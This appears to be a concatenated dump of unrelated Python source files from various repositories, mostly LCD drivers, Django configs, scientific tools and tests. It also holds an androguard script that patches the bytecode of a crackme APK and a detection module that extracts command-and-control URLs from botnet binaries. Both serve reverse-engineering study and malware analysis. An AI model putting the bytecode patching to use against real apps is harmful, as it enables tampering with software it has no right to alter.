        instructions.insert(0, dvm.Instruction10x(None, "\x00\x00") )
method.set_instructions( instructions )
FILENAME_INPUT = "apks/crash/crackme-obfuscator.apk"
FILENAME_OUTPUT = "./toto.dex"
androconf.set_debug()
a = apk.APK( FILENAME_INPUT )
vm = dvm.DalvikVMFormat( a.get_dex() )
vmx = analysis.VMAnalysis( vm )
patch_dex( vm )
new_dex = vm.save()
with open(FILENAME_OUTPUT, "w") as fd:
fd.write( new_dex )
sunfounder/SunFounder_Dragit | Dragit/Dragit/libs/modules/i2c_lcd.py | Python | gpl-2.0 | 2,054 | 0.055015 | #!/usr/bin/env python
import time
import smbus
BUS = smbus.SMBus(1)
def write_word(addr, data):
global BLEN
temp = data
if BLEN == 1:
temp |= 0x08
else:
temp &= 0xF7
BUS.write_byte(addr ,temp)
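# Bit layout on the common PCF8574 LCD backpack (illustrative): P7-P4 carry
# the data nibble, P3 drives the backlight (the 0x08 above), P2 is EN (0x04),
# P1 is RW and P0 is RS (the low bit of 0x05 in send_data below).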
def send_command(comm):
# Send bit7-4 firstly
buf = comm & 0xF0
buf |= 0x04 # RS = 0, RW = 0, EN = 1
write_word(LCD_ADDR ,buf)
time.sleep(0.002)
buf &= 0xFB # Make EN = 0
write_word(LCD_ADDR ,buf)
# Send bit3-0 secondly
buf = (comm & 0x0F) << 4
buf |= 0x04 # RS = 0, RW = 0, EN = 1
write_word(LCD_ADDR ,buf)
time.sleep(0.002)
buf &= 0xFB # Make EN = 0
write_word(LCD_ADDR ,buf)
def send_data(data):
# Send bit7-4 firstly
buf = data & 0xF0
buf |= 0x05 # RS = 1, RW = 0, EN = 1
write_word(LCD_ADDR ,buf)
time.sleep(0.002)
buf &= 0xFB # Make EN = 0
write_word(LCD_ADDR ,buf)
# Send bit3-0 secondly
buf = (data & 0x0F) << 4
buf |= 0x05 # RS = 1, RW = 0, EN = 1
write_word(LCD_ADDR ,buf)
time.sleep(0.002)
buf &= 0xFB # Make EN = 0
write_word(LCD_ADDR ,buf)
def init(addr, bl):
# global BUS
# BUS = smbus.SMBus(1)
global LCD_ADDR
global BLEN
LCD_ADDR = addr
BLEN = bl
try:
send_command(0x33) # Must initialize to 8-line mode at first
time.sleep(0.005)
send_command(0x32) # Then initialize to 4-line mode
time.sleep(0.005)
send_command(0x28) # 2 Lines & 5*7 dots
time.sleep(0.005)
send_command(0x0C) # Enable display without cursor
time.sleep(0.005)
send_command(0x01) # Clear Screen
BUS.write_byte(LCD_ADDR, 0x08)
except:
return False
else:
return True
def clear():
send_command(0x01) # Clear Screen
def openlight(): # Enable the backlight
BUS.write_byte(0x27,0x08)
BUS.close()
def write(x, y, str):
if x < 0:
x = 0
if x > 15:
x = 15
if y <0:
y = 0
if y > 1:
y = 1
# Move cursor
addr = 0x80 + 0x40 * y + x
send_command(addr)
for chr in str:
send_data(ord(chr))
if __name__ == '__main__':
init(0x27, 1)
write(4, 0, 'Hello')
write(7, 1, 'world!')
bwall/bamfdetect | BAMF_Detect/modules/herpes.py | Python | mit | 1,507 | 0.001991 | from common import Modules, data_strings, load_yara_rules, PEParseModule, ModuleMetadata, is_ip_or_domain
from re import match
class herpes(PEParseModule):
def __init__(self):
md = ModuleMetadata(
module_name="herpes",
bot_name="Herpes Net",
description="Botnet that really makes your crotch itch",
authors=["Brian Wallace (@botnet_hunter)"],
version="1.0.0",
date="April 14, 2014",
references=[]
)
PEParseModule.__init__(self, md)
self.yara_rules = None
pass
def _generate_yara_rules(self):
if self.yara_rules is None:
self.yara_rules = load_yara_rules("herpes.yara")
return self.yara_rules
def get_bot_information(self, file_data):
results = {}
gate = None
server = None
for s in data_strings(file_data):
if s.find("run.php") != -1:
gate = s
if s.startswith("http://") and len(s) > len("http://"):
domain = s[7:]
if domain.find('/') != -1:
domain = domain[:domain.find('/')]
                if is_ip_or_domain(domain):
                    server = s
            if match(r'^\d\.\d\.\d$', s) is not None:
results["version"] = s
if server is not None and gate is not None:
results["c2_uri"] = "%s%s" % (server, gate)
return results
Modules.list.append(herpes())
cydrobolt/lucem | lucem/urls.py | Python | apache-2.0 | 732 | 0.002732 | from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
from django.contrib import admin
from app import views
from app import api_views
api_urlpatterns = [
    url(r'^get_friends_light_states', api_views.json_friends_light_states, name='api_v1_get_friends_light_states'),
    url(r'^ping_friend_lights', api_views.ping_light, name='api_v1_ping_friend_lights'),
]
urlpatterns = [
# Views
url(r'^$', views.index, name='home'),
    url(r'^logout/$', views.logout, name='logout'),
# Admin and authentication
url('', include('social_django.urls', namespace='social')),
url(r'^admin/', admin.site.urls),
# API endpoints
url(r'^api/v1/', include(api_urlpatterns)),
]
vijayanandau/KnowledgeShare | makahiki/apps/widgets/AskedQuestions/urls.py | Python | mit | 216 | 0.009259 | """Ask Admin URL."""
from django.conf.urls.defaults import url, patterns
urlpatterns = patterns('',
url(r'^my_question/$',
        'apps.widgets.AskedQuestions.views.send_question', name="ask_que_question"),
)
asterix135/whoshouldivotefor | explorer/migrations/0007_auto_20170626_0543.py | Python | mit | 1,175 | 0.000851 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-26 09:43
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('explorer', '0006_auto_20170626_0345'),
]
operations = [
migrations.RenameModel(
old_name='Politician',
new_name='Candidate',
),
migrations.RenameField(
model_name='election',
old_name='start_date',
new_name='campaign_start_date',
),
migrations.RenameField(
            model_name='electioncandidate',
            old_name='politician',
new_name='candidate',
),
migrations.AlterField(
model_name='electioncandidate',
name='election',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='candidate_details', to='explorer.Election'),
),
migrations.AlterUniqueTogether(
name='electioncandidate',
unique_together=set([('candidate', 'election', 'district')]),
),
]
dmlc/tvm | python/tvm/topi/hexagon/conv2d.py | Python | apache-2.0 | 973 | 0 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Schedules for conv2d. """
import tvm
def schedule_conv2d_nhwc(outs):
"""Schedule for Conv2d NHWC operator."""
s = tvm.te.create_schedule([x.op for x in outs])
return s
SebastianoF/LabelsManager | nilabels/agents/header_controller.py | Python | mit | 6,482 | 0.004937 | import nibabel as nib
import numpy as np
from nilabels.tools.aux_methods.utils_rotations import get_small_orthogonal_rotation
from nilabels.tools.aux_methods.utils_path import get_pfi_in_pfi_out, connect_path_tail_head
from nilabels.tools.aux_methods.utils_nib import modify_image_data_type, \
modify_affine_transformation, replace_translational_part
class HeaderController(object):
"""
Facade of the methods in tools. symmetrizer, for work with paths to images rather than
with data. Methods under LabelsManagerManipulate are taking in general
one or more input manipulate them according to some rule and save the
output in the output_data_folder or in the specified paths.
"""
def __init__(self, input_data_folder=None, output_data_folder=None):
        self.pfo_in = input_data_folder
self.pfo_out = output_data_folder
def modify_image_type(self, filename_in, filename_out, new_dtype, update_description=None, verbose=1):
"""
Change data type and optionally update the nifti field descriptor.
:param filename_in: path to filename input
:param filename_out: path to filename output
:param new_dtype: numpy data type compatible input
        :param update_description: string with the new 'descrip' nifti header value.
:param verbose:
:return: image with new dtype and descriptor updated.
"""
pfi_in, pfi_out = get_pfi_in_pfi_out(filename_in, filename_out, self.pfo_in, self.pfo_out)
im = nib.load(pfi_in)
new_im = modify_image_data_type(im, new_dtype=new_dtype, update_descrip_field_header=update_description, verbose=verbose)
nib.save(new_im, pfi_out)
def modify_affine(self, filename_in, affine_in, filename_out, q_form=True, s_form=True,
multiplication_side='left'):
"""
Modify the affine transformation by substitution or by left or right multiplication
:param filename_in: path to filename input
:param affine_in: path to affine matrix input, or nd.array or .npy array
:param filename_out: path to filename output
:param q_form: affect the q_form (True)
:param s_form: affect the s_form (True)
:param multiplication_side: multiplication_side: can be lef, right, or replace.
:return: save new image with the updated affine transformation
NOTE: please see the documentation http://nipy.org/nibabel/nifti_images.html#choosing-image-affine for more on the
relationships between s_form affine, q_form affine and fall-back header affine.
"""
pfi_in, pfi_out = get_pfi_in_pfi_out(filename_in, filename_out, self.pfo_in, self.pfo_out)
if isinstance(affine_in, str):
if affine_in.endswith('.txt'):
aff = np.loadtxt(connect_path_tail_head(self.pfo_in, affine_in))
else:
aff = np.load(connect_path_tail_head(self.pfo_in, affine_in))
elif isinstance(affine_in, np.ndarray):
aff = affine_in
else:
raise IOError('parameter affine_in can be path to an affine matrix .txt or .npy or the numpy array'
'corresponding to the affine transformation.')
im = nib.load(pfi_in)
new_im = modify_affine_transformation(im, aff, q_form=q_form, s_form=s_form,
multiplication_side=multiplication_side)
nib.save(new_im, pfi_out)
def apply_small_rotation(self, filename_in, filename_out, angle=np.pi/6, principal_axis='pitch',
respect_to_centre=True):
"""
:param filename_in: path to filename input
:param filename_out: path to filename output
:param angle: rotation angle in radiants
:param principal_axis: 'yaw', 'pitch' or 'roll'
:param respect_to_centre: by default is True. If False, respect to the origin.
:return:
"""
if isinstance(angle, list):
assert isinstance(principal_axis, list)
assert len(principal_axis) == len(angle)
rot = np.identity(4)
for pa, an in zip(principal_axis, angle):
aff = get_small_orthogonal_rotation(theta=an, principal_axis=pa)
rot = rot.dot(aff)
else:
rot = get_small_orthogonal_rotation(theta=angle, principal_axis=principal_axis)
pfi_in, pfi_out = get_pfi_in_pfi_out(filename_in, filename_out, self.pfo_in, self.pfo_out)
im = nib.load(pfi_in)
if respect_to_centre:
fov_centre = im.affine.dot(np.array(list(np.array(im.shape[:3]) / float(2)) + [1]))
transl = np.eye(4)
transl[:3, 3] = fov_centre[:3]
transl_inv = np.eye(4)
transl_inv[:3, 3] = -1 * fov_centre[:3]
rt = transl.dot(rot.dot(transl_inv))
new_aff = rt.dot(im.affine)
else:
new_aff = im.affine[:]
new_aff[:3, :3] = rot[:3, :3].dot(new_aff[:3, :3])
new_im = modify_affine_transformation(im_input=im, new_aff=new_aff, q_form=True, s_form=True,
multiplication_side='replace')
nib.save(new_im, pfi_out)
def modify_translational_part(self, filename_in, filename_out, new_translation):
"""
:param filename_in: path to filename input
:param filename_out: path to filename output
:param new_translation: translation that will replace the existing one.
:return:
"""
pfi_in, pfi_out = get_pfi_in_pfi_out(filename_in, filename_out, self.pfo_in, self.pfo_out)
im = nib.load(pfi_in)
if isinstance(new_translation, str):
if new_translation.endswith('.txt'):
tr = np.loadtxt(connect_path_tail_head(self.pfo_in, new_translation))
else:
tr = np.load(connect_path_tail_head(self.pfo_in, new_translation))
elif isinstance(new_translation, np.ndarray):
tr = new_translation
elif isinstance(new_translation, list):
tr = np.array(new_translation)
else:
raise IOError('parameter new_translation can be path to an affine matrix .txt or .npy or the numpy array'
'corresponding to the new intended translational part.')
new_im = replace_translational_part(im, tr)
nib.save(new_im, pfi_out)
aliceinit/todogen | todogen_utils/todo_generator.py | Python | gpl-3.0 | 690 | 0.005797 | __author__ = 'aliceinit'
import heapq
from todogen_utils.todogen_task import TodoTask
class TodoGenerator(object):
    # todo add required place for tasks, set (optionally) places for free time periods
# todo add weather requirements for tasks (optionally) - connect to weather APIs
def __init__(self, task_manager, schedule_manager):
self.task_manager = task_manager
self.schedule_manager = schedule_manager
self.task_heap = []
def prioritize(self):
self.task_heap = []
tasks = self.task_manager.get_all_tasks()
for task in tasks:
todo_task = TodoTask(task)
            heapq.heappush(self.task_heap, todo_task)
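            # note: heapq orders by comparing TodoTask objects, so TodoTask
            # is assumed to implement ordering (e.g. __lt__) on priority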
citrix-openstack-build/python-openstackclient | openstackclient/tests/common/test_clientmanager.py | Python | apache-2.0 | 1,180 | 0 | # Copyright 2012-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from openstackclient.common import clientmanager
from openstackclient.tests import utils
class Container(object):
attr = clientmanager.ClientCache(lambda x: object())
def __init__(self):
pass
class TestClientManager(utils.TestCase):
def setUp(self):
super(TestClientManager, self).setUp()
def test_singleton(self):
# NOTE(dtroyer): Verify that the ClientCache descriptor only invokes
        # the factory one time and always returns the same value after that.
c = Container()
        self.assertEqual(c.attr, c.attr)
brolewis/oracle_of_kirk | oracle.py | Python | bsd-3-clause | 12,551 | 0.000159 | #!/usr/bin/env python2.7
# Standard Library
import argparse
import collections
import os
import re
import xml.etree.cElementTree
# Third Party
import imdb
import imdb.helpers
import mediawiki
import sqlalchemy
import sqlalchemy.ext.declarative
import sqlalchemy.ext.hybrid
import sqlalchemy.orm
CANON = {'"Star Trek" (1966)': 'TOS',
'"Star Trek: The Next Generation" (1987)': 'TNG',
'"Star Trek: Voyager" (1995)': 'VOY',
'"Star Trek: Enterprise" (2001)': 'ENT',
'"Star Trek" (1973)': 'TAS',
'"Star Trek: Deep Space Nine" (1993)': 'DS9',
'Star Trek: The Motion Picture (1979)': '',
'Star Trek II: The Wrath of Khan (1982)': '',
'Star Trek III: The Search for Spock (1984)': '',
'Star Trek IV: The Voyage Home (1986)': '',
'Star Trek V: The Final Frontier (1989)': '',
'Star Trek VI: The Undiscovered Country (1991)': '',
'Star Trek: Generations (1994)': '',
'Star Trek: First Contact (1996)': '',
'Star Trek: Insurrection (1998)': '',
'Star Trek: Nemesis (2002)': '',
'Star Trek (2009)': '',
'Star Trek Into Darkness (2013)': ''}
BASE = sqlalchemy.ext.declarative.declarative_base()
association_table = sqlalchemy.Table('character_appearance', BASE.metadata,
sqlalchemy.Column('character_id', sqlalchemy.Integer,
sqlalchemy.ForeignKey('character.id')),
sqlalchemy.Column('appearance_id', sqlalchemy.Integer,
sqlalchemy.ForeignKey('appearance.id'))
)
class Character(BASE):
__tablename__ = 'character'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
role_id = sqlalchemy.Column(sqlalchemy.String, unique=True)
name = sqlalchemy.Column(sqlalchemy.String)
article = sqlalchemy.orm.relationship('Article', uselist=False,
backref='character')
appearances = sqlalchemy.orm.relationship('Appearance',
secondary=association_table,
backref='characters')
def __repr__(self):
return self.name
class Appearance(BASE):
__tablename__ = 'appearance'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
title = sqlalchemy.Column(sqlalchemy.String)
kind = sqlalchemy.Column(sqlalchemy.String)
article = sqlalchemy.orm.relationship('Article', uselist=False,
                                              backref='appearance')
def __repr__(self):
return self.title
class Article(BASE):
    __tablename__ = 'article'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
title = sqlalchemy.Column(sqlalchemy.String)
text = sqlalchemy.Column(sqlalchemy.String)
character_id = sqlalchemy.Column(sqlalchemy.Integer,
sqlalchemy.ForeignKey('character.id'))
appearance_id = sqlalchemy.Column(sqlalchemy.Integer,
sqlalchemy.ForeignKey('appearance.id'))
def __repr__(self):
return self.title
@sqlalchemy.ext.hybrid.hybrid_property
def html(self):
return mediawiki.wiki2html(self.text or '', False)
class SixDegrees(object):
def __init__(self):
database_uri = os.getenv('DATABASE_URI', 'sqlite:///star_trek.sqlite')
engine = sqlalchemy.create_engine(database_uri)
BASE.metadata.create_all(engine)
self.session = sqlalchemy.orm.sessionmaker(bind=engine)()
self._role_names = None
def load_imdb(self):
access = imdb.IMDb()
self._role_names = collections.defaultdict(list)
for series in access.search_movie('Star Trek', results=30):
title = series['long imdb title']
kind = series['kind']
if title in CANON:
if kind == 'tv series':
title = CANON[title]
access.update(series, 'episodes')
for episode in imdb.helpers.sortedEpisodes(series):
access.update(episode)
self._parse_episode(episode, title, kind)
elif kind == 'movie':
appearance = self._get_appearance(title, kind)
movie = access.get_movie(series.movieID)
for actor in movie['cast']:
self._add_actor(actor, appearance)
self.session.add(appearance)
self.session.commit()
for role_id in self._role_names:
counter = collections.Counter(self._role_names[role_id])
query = self.session.query(Character)
character = query.filter_by(role_id=role_id).first()
character.name = counter.most_common(1)[0][0]
self.session.commit()
def _parse_episode(self, episode, series_title, series_kind):
episode_title = u'{} ({})'.format(episode['title'], series_title)
appearance = self._get_appearance(episode_title, series_kind)
for actor in episode['cast']:
self._add_actor(actor, appearance)
self.session.add(appearance)
self.session.commit()
def _add_actor(self, actor, appearance):
if isinstance(actor.currentRole, imdb.utils.RolesList):
for role in actor.currentRole:
character = self._add_character(role)
if character:
appearance.characters.append(character)
else:
character = self._add_character(actor.currentRole)
if character:
appearance.characters.append(character)
def _add_character(self, role):
generic = ('Enterprise Computer', 'Ensign', 'Starfleet Officer')
if role.get('name') and role.getID() and role['name'] not in generic:
self._role_names[role.getID()].append(role['name'])
query = self.session.query(Character)
character = query.filter_by(role_id=role.getID()).first()
if not character:
character = Character(role_id=role.getID(), name=role['name'])
self.session.add(character)
self.session.commit()
return character
def _get_appearance(self, title, kind):
query = self.session.query(Appearance)
appearance = query.filter_by(title=title).first()
if not appearance:
appearance = Appearance(title=title, kind=kind)
self.session.add(appearance)
return appearance
def load_ma(self):
name_pattern = re.compile(r'(?:\{.*\}){0,1}(.*)')
slug_pattern = re.compile(r'[\W_]+')
slugs = self.slugs
xml_dir = os.path.dirname(os.path.realpath(__file__))
xml_path = os.path.join(xml_dir, 'memory_alpha.xml')
events = ('start', 'end')
etree = xml.etree.cElementTree.iterparse(xml_path, events=events)
level = -1
for event, elem in etree:
name = name_pattern.search(elem.tag).groups()[0]
if event == 'start':
level += 1
if level == 2 and event == 'end' and name == 'title':
title = elem.text
if level == 3 and event == 'end' and name == 'text':
text = elem.text
if level == 1 and event == 'end':
if name == 'page':
slug = slug_pattern.sub('', title).lower()
if slug in slugs:
obj = slugs[slug]
article = Article(title=title, text=text)
if isinstance(obj, Appearance):
article.appearance = obj
else:
article.character = obj
self.session.add(article)
self.session.commit()
if event == 'end':
level -= 1
elem.clear()
@property
def slugs(self):
pattern = re.compile(r'[\W_]+')
slugs = {}
for appearance in self.session.query(Appearance).all():
            slug = pattern.sub(u'
kichkasch/ioids | g4ds/protocols/protocolinterface.py | Python | gpl-3.0 | 1,822 | 0.008233 | """
Provides the interface that each protocol implementation must implement to work with G4DS.
Grid for Digital Security (G4DS)
@author: Michael Pilgermann
@contact: mailto:mpilgerm@glam.ac.uk
@license: GPL (General Public License)
"""
class ProtocolInterface:
"""
Provides a common interface for all implementations for protocols.
    @ivar _name: Name of the Implementation
    @type _name: C{String}
"""
def __init__(self, name):
"""
Just ot set up the name of the implementation.
"""
self._name = name
def getName(self):
"""
GETTER
"""
return self._name
def listen(self, callback):
"""
The implementation should listen to a certain port here.
Parameters for address and the like are not required here since the implementations should load their
settings from the config module.
Any implementation must run its listener in its own thread, otherwise it
will block the entire application / library.
@param callback: Function to call whenever a new message arrives
@type callback: Function
@return: Indicates, whether the server was established sucessfully
@rtype: C{Boolean}
"""
return 0
def shutdown(self):
"""
The implementation should shut down the listener.
@return: Indicates, whether the shutdown was sucessful.
@rtype: C{Boolean}
"""
return 0
def sendMessage(self, endpoint, message):
"""
The implementation should send the message to the endpoint.
@return: Indicates, whether the message was send sucessfully
@rtype: C{Boolean}
"""
return 0
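A minimal conforming implementation sketch for the interface above (illustrative; the transport details are assumptions, not taken from G4DS):
import socket

class PlainTcpProtocol(ProtocolInterface):
    def __init__(self):
        ProtocolInterface.__init__(self, 'tcpsocket')
    def sendMessage(self, endpoint, message):
        host, port = endpoint
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((host, port))
            sock.sendall(message)
            return 1
        finally:
            sock.close()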
jjas0nn/solvem | tensorflow/lib/python2.7/site-packages/numpy/lib/tests/test_packbits.py | Python | mit | 3,214 | 0 | from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import assert_array_equal, assert_equal, assert_raises
def test_packbits():
# Copied from the docstring.
a = [[[1, 0, 1], [0, 1, 0]],
[[1, 1, 0], [0, 0, 1]]]
for dt in '?bBhHiIlLqQ':
arr = np.array(a, dtype=dt)
b = np.packbits(arr, axis=-1)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, np.array([[[160], [64]], [[192], [32]]]))
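        # e.g. the row [1, 0, 1] packs to 0b10100000 == 160 and [0, 1, 0]
        # to 0b01000000 == 64, matching the expected values above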
assert_raises(TypeError, np.packbits, np.array(a, dtype=float))
def test_packbits_empty():
shapes = [
(0,), (10, 20, 0), (10, 0, 20), (0, 10, 20), (20, 0, 0), (0, 20, 0),
(0, 0, 20), (0, 0, 0),
]
for dt in '?bBhHiIlLqQ':
for shape in shapes:
a = np.empty(shape, dtype=dt)
b = np.packbits(a)
assert_equal(b.dtype, np.uint8)
assert_equal(b.shape, (0,))
def test_packbits_empty_with_axis():
# Original shapes and lists of packed shapes for different axes.
shapes = [
((0,), [(0,)]),
((10, 20, 0), [(2, 20, 0), (10, 3, 0), (10, 20, 0)]),
((10, 0, 20), [(2, 0, 20), (10, 0, 20), (10, 0, 3)]),
((0, 10, 20), [(0, 10, 20), (0, 2, 20), (0, 10, 3)]),
((20, 0, 0), [(3, 0, 0), (20, 0, 0), (20, 0, 0)]),
((0, 20, 0), [(0, 20, 0), (0, 3, 0), (0, 20, 0)]),
((0, 0, 20), [(0, 0, 20), (0, 0, 20), (0, 0, 3)]),
((0, 0, 0), [(0, 0, 0), (0, 0, 0), (0, 0, 0)]),
]
for dt in '?bBhHiIlLqQ':
for in_shape, out_shapes in shapes:
for ax, out_shape in enumerate(out_shapes):
a = np.empty(in_shape, dtype=dt)
b = np.packbits(a, axis=ax)
assert_equal(b.dtype, np.uint8)
assert_equal(b.shape, out_shape)
def test_unpackbits():
# Copied from the docstring.
a = np.array([[2], [7], [23]], dtype=np.uint8)
b = np.unpackbits(a, axis=1)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, np.array([[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 0, 1, 1, 1]]))
def test_unpackbits_empty():
a = np.empty((0,), dtype=np.uint8)
b = np.unpackbits(a)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, np.empty((0,)))
def test_unpackbits_empty_with_axis():
# Lists of packed shapes for different axes and unpacked shapes.
shapes = [
([(0,)], (0,)),
([(2, 24, 0), (16, 3, 0), (16, 24, 0)], (16, 24, 0)),
([(2, 0, 24), (16, 0, 24), (16, 0, 3)], (16, 0, 24)),
([(0, 16, 24), (0, 2, 24), (0, 16, 3)], (0, 16, 24)),
([(3, 0, 0), (24, 0, 0), (24, 0, 0)], (24, 0, 0)),
([(0, 24, 0), (0, 3, 0), (0, 24, 0)], (0, 24, 0)),
([(0, 0, 24), (0, 0, 24), (0, 0, 3)], (0, 0, 24)),
        ([(0, 0, 0), (0, 0, 0), (0, 0, 0)], (0, 0, 0)),
]
    for in_shapes, out_shape in shapes:
for ax, in_shape in enumerate(in_shapes):
a = np.empty(in_shape, dtype=np.uint8)
b = np.unpackbits(a, axis=ax)
assert_equal(b.dtype, np.uint8)
assert_equal(b.shape, out_shape)
QuantCrimAtLeeds/PredictCode | tests/gui/predictors/sepp2_test.py | Python | artistic-2.0 | 2,313 | 0.017294 | from .helper import *
import open_cp.gui.predictors.sepp2 as sepp2
import open_cp.gui.predictors.predictor
#import datetime
@pytest.fixture
def analysis_model2(analysis_model):
analysis_model.time_range = (datetime.datetime(2017,5,21,12,30),
datetime.datetime(2017,5,21,13,30), None, None)
return analysis_model
@mock.patch("open_cp.seppexp")
def test_SEPP(seppmock, model, project_task, analysis_model2, grid_task):
provider = sepp2.SEPP(model)
assert provider.name == "Grid based SEPP"
    assert provider.settings_string is None
standard_calls(provider, project_task, analysis_model2, grid_task)
def test_serialise(model, project_task, analysis_model2, grid_task):
serialise( sepp2.SEPP(model) )
def test_no_data(model, project_task, analysis_model, grid_task):
analysis_model.time_range = (datetime.datetime(2017,5,20,12,30),
datetime.datetime(2017,5,20,13,30), None, None)
provider = sepp2.SEPP(model)
with pytest.raises(open_cp.gui.predictors.predictor.PredictionError):
standard_calls(provider, project_task, analysis_model, grid_task)
@mock.patch("open_cp.seppexp")
def test_training_usage(seppmock, model, project_task, analysis_model2, grid_task):
provider = sepp2.SEPP(model)
subtask = standard_calls(provider, project_task, analysis_model2, grid_task)
seppmock.SEPPTrainer.assert_called_with(grid=grid_task.return_value)
trainer_mock = seppmock.SEPPTrainer.return_value
np.testing.assert_allclose(trainer_mock.data.xcoords, [0, 10])
np.testing.assert_allclose(trainer_mock.data.ycoords, [10, 20])
time_diffs = ( (trainer_mock.data.timestamps -
[np.datetime64("2017-05-21T12:30"), np.datetime64("2017-05-21T13:00")])
/ np.timedelta64(1,"ms") )
np.testing.assert_allclose(time_diffs, [0,0])
trainer_mock.train.assert_called_with(iterations=40, use_corrected=True)
pred = trainer_mock.train.return_value
np.testing.assert_allclose(pred.data.xcoords, [0, 10, 20])
np.testing.assert_allclose(pred.data.ycoords, [10, 20, 0])
train_date = datetime.datetime(2017,5,22,5,35)
prediction = subtask(train_date)
assert prediction == pred.predict.return_value
pred.predict.assert_called_with(train_date)
|
ndawe/rootpy | rootpy/tests/test_decorators.py | Python | bsd-3-clause | 2,286 | 0.001312 | from rootpy import ROOT
from rootpy.base import Object
from rootpy.decorators import (method_file_check, method_file_cd,
snake_case_methods)
from rootpy.io import TemporaryFile
import rootpy
from nose.tools import assert_equal, assert_true, raises
def test_snake_case_methods():
class A(object):
def SomeMethod(self): pass
def some_method(self): pass
def OtherMethod(self): pass
def Write(self): pass
def Cd(self): pass
def cd(self): pass
def LongMethodName(self): pass
@snake_case_methods
class B(A):
_ROOT = A
def write(self): pass
assert_true(hasattr(B, 'some_method'))
assert_true(hasattr(B, 'cd'))
assert_true(hasattr(B, 'long_method_name'))
assert_true(hasattr(B, 'write'))
assert_true(hasattr(B, 'other_method'))
def test_snake_case_methods_descriptor():
def f(_): pass
class A(object):
Prop = property(f)
Sm = staticmethod(f)
Cm = classmethod(f)
M = f
class B(A):
cm = A.__dict__["Cm"]
m = A.__dict__["M"]
prop = A.__dict__["Prop"]
sm = A.__dict__["Sm"]
@snake_case_methods
class snakeB(A):
_ROOT = A
# Ensure that no accidental descriptor dereferences happened inside
# `snake_case_methods`. This is checked by making sure that | the types
# are the same between B and snakeB.
for member in dir(snakeB):
if member.startswith("_"): continue
assert_equal(type(getattr(B, member)), type(getattr(snakeB, member)))
class Foo(Object, ROOT.R.TH1D):
@method_file_check
def something(self, foo):
self.file = ROOT.gDir | ectory
return foo
@method_file_cd
def write(self):
assert_true(self.GetDirectory() == ROOT.gDirectory)
def test_method_file_check_good():
foo = Foo()
with TemporaryFile():
foo.something(42)
#@raises(RuntimeError)
#def test_method_file_check_bad():
# foo = Foo()
# foo.something(42)
def test_method_file_cd():
file1 = TemporaryFile()
foo = Foo()
foo.SetDirectory(file1)
file2 = TemporaryFile()
foo.write()
file1.Close()
file2.Close()
if __name__ == "__main__":
import nose
nose.runmodule()
|
Eliel-Lopes/Python-URI | 1003.py | Python | mit | 75 | 0.026667 | A = int(in | put())
B = int(input())
SOMA = (A + B)
print("SOMA = % | d" %SOMA)
|
mattrobenolt/warehouse | tasks/__init__.py | Python | apache-2.0 | 673 | 0 | # Copyright 2013 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the | License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distr | ibuted on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import invoke
from . import release
from . import static
ns = invoke.Collection(release, static)
|
lecly/pymongo-driver | tests/data/for_purifier.py | Python | mit | 2,478 | 0.000404 | #!/usr/bin/env python
# vim: set fileencoding=utf-8 :
_str_field = 789
_int_field = '123'
_float_field = '123.45'
_bool_field = 'x'
_int_field_default_none = None
_tuple_int_field = ('12', '23')
_list_str_field = [78, 89]
def data_input():
source = {
'str_field': _str_field,
'int_field': _int_field,
'float_field': _float_field,
'bool_field': _bool_field,
'int_field_default_none': _int_field_default_none,
'tuple_int_field': _tuple_int_field,
'list_str_field': _list_ | str_field,
}
return _data_build(source)
def data_output():
source = {
'str_field': str(_str_field),
'int_field': int(_int_field),
'float_field': float(_float_field),
'bool_field': bool(_bool_field),
'int_field_default_none': None if _int_field_default_none is None else int(_int_field_default_none),
'tuple_int_field': list(int(i) fo | r i in _tuple_int_field),
'list_str_field': list(str(s) for s in _list_str_field),
}
return _data_build(source)
def _data_build(source):
str_field = source.get('str_field')
int_field = source.get('int_field')
float_field = source.get('float_field')
bool_field = source.get('bool_field')
int_field_default_none = source.get('int_field_default_none')
tuple_int_field = source.get('tuple_int_field')
list_str_field = source.get('list_str_field')
dict_field = {
'str_field': str_field,
'int_field': int_field,
'float_field': float_field,
'bool_field': bool_field,
'tuple_int_field': tuple_int_field,
'list_str_field': list_str_field,
}
dict_field_nesting = {
'str_field': str_field,
'int_field': int_field,
'float_field': float_field,
'bool_field': bool_field,
'tuple_int_field': tuple_int_field,
'list_str_field': list_str_field,
'dict_field': dict_field
}
return {
'str_field': str_field,
'int_field': int_field,
'float_field': float_field,
